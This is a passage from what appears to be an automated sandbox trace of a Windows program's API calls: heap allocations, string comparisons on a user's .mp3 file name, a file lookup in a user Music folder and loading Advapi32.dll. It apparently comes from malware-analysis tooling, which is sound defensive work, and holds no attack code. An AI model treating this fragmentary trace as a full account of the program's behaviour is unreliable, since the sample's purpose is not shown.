dwCmpFlags=0x1, lpString1="SI3T x_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I3T x_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3T x_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T x_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" x_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_6.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.918] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0252.918] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0252.918] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.918] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.919] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0252.919] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0252.919] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.919] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0252.919] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.919] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.920] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.920] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\SI3T x_6.mp3", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bd51140, ftCreationTime.dwHighDateTime=0x1d4cd15, ftLastAccessTime.dwLowDateTime=0x473185e0, ftLastAccessTime.dwHighDateTime=0x1d4d061, ftLastWriteTime.dwLowDateTime=0x473185e0, ftLastWriteTime.dwHighDateTime=0x1d4d061, nFileSizeHigh=0x0, nFileSizeLow=0xc6c8, dwReserved0=0xdd0530, dwReserved1=0xdb33, cFileName="SI3T x_6.mp3", cAlternateFileName="SI3TX_~1.MP3")) returned 0xaa5660 [0252.920] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0252.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.920] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0252.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.923] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0252.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0252.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0252.923] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.924] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.924] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.924] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.925] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa988 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.925] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.925] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.925] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.926] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.926] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.928] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.929] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.929] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.930] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0252.930] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0252.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0252.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.930] RtlAllocateHeap 